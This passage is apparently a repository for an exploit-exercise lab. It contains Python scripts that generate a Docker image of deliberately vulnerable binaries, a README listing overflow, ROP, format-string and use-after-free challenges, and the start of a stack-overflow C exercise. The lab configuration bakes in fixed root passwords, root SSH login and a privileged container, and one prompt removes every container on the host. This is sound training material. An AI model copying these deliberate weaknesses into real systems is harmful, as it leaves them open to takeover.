├── ChallengeBuild.py ├── DockerFile.py ├── README.md ├── binaries ├── arm32v7 │ ├── ch00 │ ├── ch01 │ ├── ch02 │ ├── ch03 │ ├── ch04 │ ├── ch05 │ ├── ch06 │ ├── ch07 │ ├── ch08 │ ├── ch09 │ ├── ch10 │ ├── ch11 │ └── ch12 └── i386 │ ├── ch00 │ ├── ch01 │ ├── ch02 │ ├── ch03 │ ├── ch04 │ ├── ch05 │ ├── ch06 │ ├── ch07 │ ├── ch08 │ ├── ch09 │ └── ch10 ├── exercises-arm32v7 ├── banner ├── ch00 │ ├── ch00.c │ ├── compile.sh │ └── flag ├── ch01 │ ├── ch01.c │ ├── compile.sh │ └── flag ├── ch02 │ ├── ch02.c │ ├── compile.sh │ └── flag ├── ch03 │ ├── ch03.c │ ├── compile.sh │ └── flag ├── ch04 │ ├── ch04.c │ ├── compile.sh │ └── flag ├── ch05 │ ├── ch05.c │ ├── compile.sh │ └── flag ├── ch06 │ ├── ch06.c │ ├── compile.sh │ └── flag ├── ch07 │ ├── ch07.c │ ├── compile.sh │ └── flag ├── ch08 │ ├── ch08.c │ ├── compile.sh │ └── flag ├── ch09 │ ├── ch09.c │ ├── compile.sh │ └── flag ├── ch10 │ ├── ch10.c │ ├── compile.sh │ └── flag ├── ch11 │ ├── ch11.c │ ├── compile.sh │ └── flag ├── ch12 │ ├── ch12.c │ ├── compile.sh │ └── flag ├── motd └── welcome │ ├── compile.sh │ ├── flag │ └── welcome.c ├── exercises-i386 ├── banner ├── ch00 │ ├── ch00.c │ ├── compile.sh │ └── flag ├── ch01 │ ├── ch01.c │ ├── compile.sh │ └── flag ├── ch02 │ ├── ch02.c │ ├── compile.sh │ └── flag ├── ch03 │ ├── ch03.c │ ├── compile.sh │ └── flag ├── ch04 │ ├── ch04.c │ ├── compile.sh │ └── flag ├── ch05 │ ├── ch05.c │ ├── compile.sh │ └── flag ├── ch06 │ ├── ch06.c │ ├── compile.sh │ └── flag ├── ch07 │ ├── ch07.c │ ├── compile.sh │ └── flag ├── ch08 │ ├── ch08.c │ ├── compile.sh │ └── flag ├── ch09 │ ├── ch09.c │ ├── compile.sh │ └── flag ├── ch10 │ ├── ch10.c │ ├── compile.sh │ └── flag ├── motd └── welcome │ ├── compile.sh │ ├── flag │ └── welcome.c ├── main.py ├── qemu-arm-static └── writeups ├── arm32v7 ├── ArmExploit.py ├── ArmExploit.pyc ├── ch00 │ ├── ch00 │ ├── ch00.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch01 │ ├── ch01 │ ├── ch01.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── 
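ch02 │ ├── ch02 │ ├── ch02.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch03 │ ├── ch03 │ ├── ch03.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch04 │ ├── ch04 │ ├── ch04.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch05 │ ├── ch05 │ ├── ch05.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch06 │ ├── ch06 │ ├── ch06.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch07 │ ├── ch07 │ ├── ch07.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch08 │ ├── ch08 │ ├── ch08.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch09 │ ├── ch09 │ ├── ch09.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch10 │ ├── ch10 │ ├── ch10.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch11 │ ├── ch11 │ ├── ch11.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── ch12 │ ├── ch12 │ ├── ch12.c │ ├── compile.sh │ ├── exploit.py │ └── flag ├── debug.sh ├── gdb_plugin.sh ├── remote.sh ├── run.sh └── setup.sh └── i386 ├── I386Exploit.py ├── I386Exploit.pyc ├── ch00 ├── ch00 ├── ch00.c ├── compile.sh ├── exploit.py └── flag ├── ch01 ├── ch01 ├── ch01.c ├── compile.sh ├── exploit.py └── flag ├── ch02 ├── ch02 ├── ch02.c ├── compile.sh ├── exploit.py └── flag ├── ch03 ├── ch03 ├── ch03.c ├── compile.sh ├── exploit.py └── flag ├── ch04 ├── ch04 ├── ch04.c ├── compile.sh ├── exploit.py └── flag ├── ch05 ├── ch05 ├── ch05.c ├── compile.sh ├── exploit.py └── flag ├── ch06 ├── ch06 ├── ch06.c ├── compile.sh ├── exploit.py └── flag ├── ch07 ├── ch07 ├── ch07.c ├── compile.sh ├── exploit.py └── flag ├── ch08 ├── ch08 ├── ch08.c ├── compile.sh ├── exploit.py └── flag ├── ch09 ├── ch09 ├── ch09.c ├── compile.sh ├── exploit.py └── flag ├── ch10 ├── ch10 ├── ch10.c ├── compile.sh ├── exploit.py └── flag ├── gdb_plugin.sh ├── remote.sh └── setup.sh
/ChallengeBuild.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

import argparse
import os


class ChallengeBuild(object):
    """Collect the challenge source files available for one architecture.

    Used as a context manager: entering it runs :meth:`generate`, after which
    ``sources`` holds the ``NAME.c`` file name of every challenge folder that
    contains a source file named after the folder.
    """

    def __init__(self, directory, arch, aslr):
        """
        Scan for challenges
        :param directory: folder that holds the ``exercises-*`` directories;
            the current working directory is used when this is empty
        :param arch: ``'i386'`` selects the i386 exercises, any other value
            selects the arm32v7 ones
        :param aslr: the string ``'yes'`` selects the ``-aslr`` exercise set,
            any other value selects the plain set
        """
        if not directory:
            directory = os.getcwd()
        self.directory = directory
        self.sources = []
        self.arch = arch
        self.aslr = aslr == 'yes'

    def __enter__(self):
        self.generate()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Nothing to release; exceptions raised inside the with-block propagate.
        return

    def generate(self):
        """Fill ``self.sources`` with the challenge source names, sorted.

        :raises OSError: when the selected exercises directory does not exist
        """
        arch_name = 'i386' if self.arch == 'i386' else 'arm32v7'
        architecture_challenges = 'exercises-{0}{1}'.format(arch_name, '-aslr' if self.aslr else '')
        challenges_root = os.path.join(self.directory, architecture_challenges)

        # Rebuild the list from scratch so a second call does not append duplicates.
        found = []
        # os.listdir() returns entries in arbitrary order; sorting keeps the
        # Dockerfile generated from this list reproducible between runs.
        for entry in sorted(os.listdir(challenges_root)):
            challenge_folder = os.path.join(challenges_root, entry)
            if not os.path.isdir(challenge_folder):
                continue
            # A folder counts as a challenge only if it holds "<folder name>.c".
            source_name = entry + '.c'
            if os.path.isfile(os.path.join(challenge_folder, source_name)):
                found.append(source_name)
        self.sources = found


def main(arch, aslr, directory=None):
    """Scan ``directory`` and print the list of challenge sources found."""
    with ChallengeBuild(directory=directory, arch=arch, aslr=aslr) as handle:
        # A parenthesised single argument prints the same under Python 2 and 3.
        print(handle.sources)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Scan directory and prepares Challanges & Flags')
    parser.add_argument('-d', '--directory', help='main directory', required=False, dest='directory')
    # choices= rejects typos up front: without it any unknown architecture is
    # treated as arm32v7 and any value other than 'yes' silently means "no ASLR".
    parser.add_argument('-a', '--architecture', help='i386/arm32v7', required=True, dest='arch',
                        choices=('i386', 'arm32v7'))

    parser.add_argument('-as', '--aslr', help='yes/no', required=True, dest='aslr', choices=('yes', 'no'))

    main(**vars(parser.parse_args()))
--------------------------------------------------------------------------------
/DockerFile.py: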
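--------------------------------------------------------------------------------
__author__ = '@tomereyz'

import argparse
import os
import re
import subprocess

try:  # Python 2, the interpreter the README lists as prerequisite
    _read_line = raw_input
except NameError:  # Python 3
    _read_line = input

# Challenge names are pasted into shell-form RUN lines of the Dockerfile, and the
# docker name is passed to the docker CLI, so both are restricted to plain names.
_CHALLENGE_NAME_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9_-]*\Z')
_DOCKER_NAME_RE = re.compile(r'^[A-Za-z0-9][A-Za-z0-9_.-]*\Z')

# NOTE(review): the image built from this template is a deliberately weak
# exploitation lab, not something to run on a reachable network as-is:
#   * root gets the fixed password 'default' and sshd is set to PermitRootLogin yes
#   * the base image is referenced without a tag and peda is cloned from its default
#     branch without a pinned commit, so the build is not reproducible and runs
#     whatever those sources hold at build time (peda is sourced from root's ~/.gdbinit)
#   * kernel.randomize_va_space and kernel.dmesg_restrict are kernel-wide settings,
#     not per-container ones, and a value written by `RUN sysctl -w` during
#     `docker build` is not stored in the image; presumably the ASLR mode has to be
#     set on the Docker host (or from the privileged running container) - TODO confirm
DOCKERFILE_TEMPLATE = """

{architecture_dependant}
RUN apt-get update

WORKDIR /

RUN apt-get install -y openssh-server
RUN apt-get install -y sudo
RUN apt-get install -y python
RUN apt-get install -y gdb
RUN apt-get install -y git
RUN apt-get install -y vim
RUN apt-get install -y gcc
RUN apt-get install -y strace

{challenge_template}

RUN mkdir /var/run/sshd
RUN echo 'root:default' | chpasswd

RUN sed -i 's/[#]*PermitRootLogin [a-zA-Z\-]*/PermitRootLogin yes/' /etc/ssh/sshd_config
RUN sed -i 's/[#]*UsePrivilegeSeparation [a-zA-Z\-]*/UsePrivilegeSeparation no/' /etc/ssh/sshd_config
RUN sed -i 's/[#]*Banner [a-zA-Z\-\/\.]*/Banner \/etc\/banner/' /etc/ssh/sshd_config

RUN sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd
RUN echo "export VISIBLE=now" >> /etc/profile
RUN sysctl -w kernel.dmesg_restrict=1
RUN chmod 1733 /tmp /var/tmp /dev/shm

RUN git clone https://github.com/longld/peda.git /usr/bin/peda
RUN echo "source /usr/bin/peda/peda.py" >> ~/.gdbinit
RUN chmod 0755 /usr/bin/peda/*.py
RUN chmod 0755 /usr/bin/peda/lib/*.py

RUN sysctl -w kernel.randomize_va_space={aslr}


EXPOSE 22
CMD ["/usr/sbin/sshd", "-D"]
"""

# Per-challenge layout produced by this template:
#   * {challenge_name} is the login user, with the user name as password
#   * {challenge_name}_root owns the flag (mode 0400) and the challenge binary, which
#     is installed setuid (mode 4550) with group {challenge_name}
#   * {challenge_name}_root gets the fixed password 'default'
# The commands in each RUN line are chained with ';', so a failing adduser or
# compile step does not stop the image build.
CHALLENGE_TEMPLATE = """

COPY {architecture_challenges}/{challenge_name}/* /home/{challenge_name}/

RUN adduser {challenge_name} ; adduser {challenge_name}_root ; usermod -G {challenge_name} {challenge_name} ; usermod -G {challenge_name}_root {challenge_name}_root ; /home/{challenge_name}/compile.sh /home/{challenge_name}

RUN chown {challenge_name}_root /home/{challenge_name}/flag ; chown {challenge_name}_root:{challenge_name} /home/{challenge_name}/{challenge_name} ; chown {challenge_name}:{challenge_name} /home/{challenge_name}/{challenge_name}.c /home/{challenge_name}/compile.sh ; chown root:root /home/{challenge_name}_root

RUN chmod 0400 /home/{challenge_name}/flag ; chmod 4550 /home/{challenge_name}/{challenge_name} ; chmod 0440 /home/{challenge_name}/{challenge_name}.c /home/{challenge_name}/compile.sh

RUN echo '{challenge_name}:{challenge_name}' | chpasswd ; echo '{challenge_name}_root:default' | chpasswd ; echo "source /usr/bin/peda/peda.py" > /home/{challenge_name}/.gdbinit

"""


def _challenge_name(source):
    """Return the challenge name for a source file name such as ``ch00.c``.

    :raises ValueError: when the name holds characters that are not safe to paste
        into the shell-form ``RUN``/``COPY`` lines of CHALLENGE_TEMPLATE
    """
    name = source[:-2] if source.endswith('.c') else source
    if not _CHALLENGE_NAME_RE.match(name):
        raise ValueError('invalid challenge name: {0!r}'.format(source))
    return name


class DockerFile(object):
    """Render the lab Dockerfile and, on request, build and start the container."""

    def __init__(self, sources, docker_name, no_cache, port, build_run, arch, aslr):
        """
        Generate dockerfile
        :param sources: challenge source file names (``ch00.c`` ...); a single
            string is treated as one name
        :param docker_name: used both as image tag and as container name
        :param no_cache: truthy to pass ``--no-cache`` to ``docker build``
        :param port: host port published to the container's sshd (port 22)
        :param build_run: truthy to build and run after writing the Dockerfile
        :param arch: ``'i386'``, any other value selects arm32v7
        :param aslr: the string ``'yes'`` enables the ASLR variant, anything else disables it
        """
        # Iterating a bare string would yield single characters as challenge names.
        self.sources = [sources] if isinstance(sources, str) else sources
        self.dockerfile = None
        self.docker_name = docker_name
        self.no_cache = '--no-cache' if no_cache else ''
        self.port = port
        self.build_run = build_run
        self.arch = arch
        self.aslr = aslr == 'yes'

    def __enter__(self):
        self.generate()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Nothing to release; exceptions raised inside the with-block propagate.
        return

    def _format_template(self):
        """Render DOCKERFILE_TEMPLATE for the configured architecture into ``self.dockerfile``.

        :raises ValueError: when a source name is not a plain challenge name
        """
        if self.arch == 'i386':
            architecture_challenges = "exercises-i386-aslr" if self.aslr else 'exercises-i386'
            architecture_dependant = "FROM i386/ubuntu\nCOPY {arch_c}/banner /etc/banner\nCOPY {arch_c}/motd /etc/motd".format(
                arch_c=architecture_challenges)
        else:
            architecture_challenges = "exercises-arm32v7-aslr" if self.aslr else 'exercises-arm32v7'
            architecture_dependant = "FROM armhf/ubuntu\nCOPY qemu-arm-static /usr/bin/\nCOPY {arch_c}/motd /etc/motd\nCOPY {arch_c}/banner /etc/banner".format(
                arch_c=architecture_challenges)

        challenge_template = ''.join(
            CHALLENGE_TEMPLATE.format(challenge_name=_challenge_name(source),
                                      architecture_challenges=architecture_challenges)
            for source in self.sources)

        self.dockerfile = DOCKERFILE_TEMPLATE.format(architecture_dependant=architecture_dependant,
                                                     challenge_template=challenge_template,
                                                     aslr='2' if self.aslr else '0')

    def _docker_build_run(self):
        """Optionally clear existing containers, then build the image and start the lab container.

        Commands are passed to docker as argument lists, so ``docker_name`` and
        ``port`` are never interpreted by a shell.

        :raises ValueError: when ``docker_name`` is not a plain name or ``port``
            is not a TCP port number
        """
        if not _DOCKER_NAME_RE.match(str(self.docker_name)):
            raise ValueError('invalid docker name: {0!r}'.format(self.docker_name))
        try:
            port = int(self.port)
        except (TypeError, ValueError):
            raise ValueError('invalid port: {0!r}'.format(self.port))
        if not 0 < port < 65536:
            raise ValueError('invalid port: {0!r}'.format(self.port))

        interactive = _read_line(
            'execute `sudo docker stop $(sudo docker ps -a -q) ; sudo docker rm $(sudo docker ps -a -q)` y/n?')
        if interactive == 'y':
            # This stops and removes EVERY container on the host, not only this lab's.
            try:
                listing = subprocess.check_output(['sudo', 'docker', 'ps', '-a', '-q'])
            except subprocess.CalledProcessError:
                # Best effort, as before: a failed listing just means nothing is removed.
                listing = b''
            container_ids = listing.decode().split()
            if container_ids:
                subprocess.call(['sudo', 'docker', 'stop'] + container_ids)
                subprocess.call(['sudo', 'docker', 'rm'] + container_ids)

        build_command = ['sudo', 'docker', 'build']
        if self.no_cache:
            build_command.append(self.no_cache)
        build_command += ['-t', self.docker_name, '.']
        subprocess.call(build_command)

        # NOTE(review): --privileged already grants every capability and runs the
        # container without the default seccomp profile, so the two options after it
        # are redundant. Together with the fixed passwords baked into the image,
        # anyone who can reach the published port can become root inside a container
        # that has host-level device and sysctl access. '-p PORT:22' publishes on all
        # host interfaces; '-p 127.0.0.1:PORT:22' keeps the lab local to the host.
        subprocess.call(['sudo', 'docker', 'run', '--privileged', '--cap-add=SYS_PTRACE',
                         '--security-opt', 'seccomp=unconfined', '-d',
                         '-p', '{0}:22'.format(port),
                         '--name', self.docker_name, self.docker_name])

    def generate(self):
        """Write ``Dockerfile`` into the current directory and build/run when requested."""
        self._format_template()
        with open('Dockerfile', 'w') as f:
            f.write(self.dockerfile)

        if self.build_run:
            self._docker_build_run()


def main(port, arch, sources, docker_name, aslr, no_cache=True, build_run=False):
    """Generate the Dockerfile (and optionally build/run it), then print the sources used."""
    with DockerFile(sources=sources, docker_name=docker_name, port=port, no_cache=no_cache,
                    build_run=build_run, arch=arch, aslr=aslr) as handle:
        # A parenthesised single argument prints the same under Python 2 and 3.
        print(handle.sources)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Scan directory and prepares challenges & Flags')
    # nargs='+' yields a list; a single string would be iterated character by character.
    parser.add_argument('-s', '--sources', help='challenges sources names', required=True, dest='sources',
                        nargs='+')
    parser.add_argument('-d', '--docker-name', help='docker name', required=True, dest='docker_name')
    # Despite its name, passing this flag stores False in no_cache, i.e. it turns the
    # build cache ON; without the flag the image is built with --no-cache.
    parser.add_argument('-ca', '--no-cache', help='use cache when building docker', required=False, dest='no_cache',
                        action='store_false')
    parser.add_argument('-r', '--build-run', help='build and run docker', required=False, dest='build_run',
                        action='store_true')
    parser.add_argument('-p', '--port', help='running docker port', required=True, dest='port')

    # choices= rejects typos up front: without it any unknown architecture is
    # treated as arm32v7 and any value other than 'yes' silently disables ASLR.
    parser.add_argument('-a', '--architecture', help='i386/arm32v7', required=True, dest='arch',
                        choices=('i386', 'arm32v7'))
    parser.add_argument('-as', '--aslr', help='yes/no', required=True, dest='aslr', choices=('yes', 'no'))

    main(**vars(parser.parse_args()))
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ZenySec-Exploit-Exercises 2 | Exploit Exercises for Security Researchers 3 | 4 | Infrastructure to create multi architecture environments with a collection of vulnerable binaries 5 | 6 | ## Website 7 | [zenysec.com](https://zenysec.com) 8 | 9 | ## Architectures 10 | 11 | ### Armv7 (32bit) 12 | [e.zenysec.com](http://e.zenysec.com) 13 | 14 | `ch00` - Stack Buffer Overflow 15 | 16 | `ch01` - Stack Buffer Overflow 17 | 18 | `ch02` - Stack Buffer Overflow 19 | 20 | `ch03` - Return Oriented Programming 21 | 22 | `ch04` - Buffer Overflow 23 | 24 | `ch05` - Format String 25 | 26 | `ch06` - Shellcode 27 | 28 | `ch07` - Return Oriented Programming 29 | 30 | `ch08` - Return Oriented Programming 31 | 32 | `ch09` - Return Oriented Programming 33 | 34 | `ch10` - Shellcode 35 | 36 | `ch11` - Heap Buffer Overflow 37 | 38 | `ch12` - Use After Free 39 | 40 | ### Intel i386 (32bit) 41 | [e.zenysec.com](http://e.zenysec.com/) 42 | 43 | `ch00` - Stack Buffer Overflow 44 | 45 | `ch01` - Stack Buffer Overflow 46 | 47 | `ch02` - Stack Buffer Overflow 48 | 49 | `ch03` - Return Oriented Programming 50 | 51 | `ch04` - Buffer Overflow 52 | 53 | `ch05` - Format String 54 | 55 | `ch06` - Shellcode 56 | 57 | `ch07` - Return Oriented Programming 58 | 59 | `ch08` - Shellcode 60 | 61 | `ch09` - Heap Buffer Overflow 62 | 63 | `ch10` - Use After Free 64 | 65 | 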
### Prerequisites 66 | 67 | ``` 68 | Python 2.7 69 | Docker 70 | ``` 71 | 72 | ## Getting Started 73 | 74 | Example to generate i386 environment with ssh service on port 20000 75 | ``` 76 | git clone https://github.com/eLoopWoo/zenysec-exploit-exercises 77 | cd zenysec-exploit-exercises 78 | python main.py -d exercises-i386 -ca -r -p 20000 -a i386 -as no 79 | ``` 80 | 81 | Example to generate arm32v7 environment with ssh service on port 20000 82 | ``` 83 | git clone https://github.com/eLoopWoo/zenysec-exploit-exercises 84 | cd zenysec-exploit-exercises 85 | python main.py -d exercises-arm32v7 -ca -r -p 20000 -a arm32v7 -as no 86 | ``` 87 | 88 | The goal is to log in as the basic user "exercise", escalate privileges to the second user "exercise_root", and read the contents of the protected "flag" file. (For basic users, the challenge name, user name and password are identical.) The container is started with `--privileged` and accepts the fixed passwords shown below, so publish its SSH port only on an isolated lab network. 89 | 90 | Example for exercise ch00 91 | ``` 92 | user: ch00 93 | password: ch00 94 | 95 | user: ch00_root 96 | password: default (unknown) 97 | ``` 98 | 99 | Compiled binaries located under "binaries" directory 100 | 101 | Sources located under "exercises-architecture" directory (architecture dependant) 102 | 103 | ## Todo's 104 | * Add more exercises ( integer, timing, heap corruption... ) 105 | * Add exercises with different malloc implementations ( glibc, jemalloc... ) 106 | * Add more architectures ( mips, risc-v, amd64... ) 107 | 108 | ## Help & Guidance 109 | 110 | Create issues with the specific problem. 
111 | Any further questions or requests Tweet me [@tomereyz](https://twitter.com/tomereyz) 112 | 113 | ## Authors 114 | 115 | * **Tomer Eyzenberg** - *Initial work* - [eLoopWoo](https://github.com/eLoopWoo) 116 | 117 | -------------------------------------------------------------------------------- /binaries/arm32v7/ch00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch00 -------------------------------------------------------------------------------- /binaries/arm32v7/ch01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch01 -------------------------------------------------------------------------------- /binaries/arm32v7/ch02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch02 -------------------------------------------------------------------------------- /binaries/arm32v7/ch03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch03 -------------------------------------------------------------------------------- /binaries/arm32v7/ch04: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch04 -------------------------------------------------------------------------------- /binaries/arm32v7/ch05: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch05 -------------------------------------------------------------------------------- /binaries/arm32v7/ch06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch06 -------------------------------------------------------------------------------- /binaries/arm32v7/ch07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch07 -------------------------------------------------------------------------------- /binaries/arm32v7/ch08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch08 -------------------------------------------------------------------------------- /binaries/arm32v7/ch09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch09 -------------------------------------------------------------------------------- /binaries/arm32v7/ch10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch10 -------------------------------------------------------------------------------- /binaries/arm32v7/ch11: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch11 -------------------------------------------------------------------------------- /binaries/arm32v7/ch12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/arm32v7/ch12 -------------------------------------------------------------------------------- /binaries/i386/ch00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch00 -------------------------------------------------------------------------------- /binaries/i386/ch01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch01 -------------------------------------------------------------------------------- /binaries/i386/ch02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch02 -------------------------------------------------------------------------------- /binaries/i386/ch03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch03 -------------------------------------------------------------------------------- /binaries/i386/ch04: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch04 -------------------------------------------------------------------------------- /binaries/i386/ch05: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch05 -------------------------------------------------------------------------------- /binaries/i386/ch06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch06 -------------------------------------------------------------------------------- /binaries/i386/ch07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch07 -------------------------------------------------------------------------------- /binaries/i386/ch08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch08 -------------------------------------------------------------------------------- /binaries/i386/ch09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch09 -------------------------------------------------------------------------------- /binaries/i386/ch10: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/binaries/i386/ch10 -------------------------------------------------------------------------------- /exercises-arm32v7/banner: -------------------------------------------------------------------------------- 1 | 2 | ███████╗███████╗███╗ ██╗██╗ ██╗███████╗███████╗ ██████╗ 3 | ╚══███╔╝██╔════╝████╗ ██║╚██╗ ██╔╝██╔════╝██╔════╝██╔════╝ 4 | ███╔╝ █████╗ ██╔██╗ ██║ ╚████╔╝ ███████╗█████╗ ██║ 5 | ███╔╝ ██╔══╝ ██║╚██╗██║ ╚██╔╝ ╚════██║██╔══╝ ██║ 6 | ███████╗███████╗██║ ╚████║ ██║ ███████║███████╗╚██████╗ 7 | ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═════╝ 8 | 9 | █████╗ ██████╗ ███╗ ███╗██████╗ ██████╗ ██╗ ██╗███████╗ 10 | ██╔══██╗██╔══██╗████╗ ████║╚════██╗╚════██╗██║ ██║╚════██║ 11 | ███████║██████╔╝██╔████╔██║ █████╔╝ █████╔╝██║ ██║ ██╔╝ 12 | ██╔══██║██╔══██╗██║╚██╔╝██║ ╚═══██╗██╔═══╝ ╚██╗ ██╔╝ ██╔╝ 13 | ██║ ██║██║ ██║██║ ╚═╝ ██║██████╔╝███████╗ ╚████╔╝ ██║ 14 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚══════╝ ╚═══╝ ╚═╝ 15 | 16 | ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ 17 | ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ 18 | █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ███████║ ██║ ██║██║ ██║██╔██╗ ██║ 19 | ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ 20 | ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ 21 | ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ 22 | 23 | ███████╗██╗ ██╗███████╗██████╗ ██████╗██╗███████╗███████╗███████╗ 24 | ██╔════╝╚██╗██╔╝██╔════╝██╔══██╗██╔════╝██║██╔════╝██╔════╝██╔════╝ 25 | █████╗ ╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗█████╗ ███████╗ 26 | ██╔══╝ ██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔══╝ ╚════██║ 27 | ███████╗██╔╝ ██╗███████╗██║ ██║╚██████╗██║███████║███████╗███████║ 28 | ╚══════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝╚══════╝╚══════╝╚══════╝ 29 | 
--------------------------------------------------------------------------------
/exercises-arm32v7/ch00/ch00.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// ch00: menu-driven "message" program. The README on this page lists it as a
// "Stack Buffer Overflow" exercise, so the weakness in send() is intentional.
// NOTE(review): the header names are missing from the three #include lines as
// shown on this page (likely lost in extraction). The code calls printf/fgets,
// system and strcmp, so presumably stdio.h, stdlib.h and string.h - confirm
// against the repository.
#include
#include
#include

// Size of every input buffer in this program.
#define BUF_SIZE 50

// Prints the flag file through the shell. Its only call site is the value
// check at the end of send().
void secret(){
    system("cat flag");
}

// Reads a message name and a message content from stdin and echoes them back.
void send(){
    // The fields live in one struct, so their order in memory is the
    // declaration order: name, then content, then value.
    struct locals{
        char name[BUF_SIZE];
        char content[BUF_SIZE];
        char value;
    };
    // value starts at 0 and no statement below assigns it.
    struct locals l = {.value = 0, .content = {0}, .name = {0}};

    printf("Creating message\n");
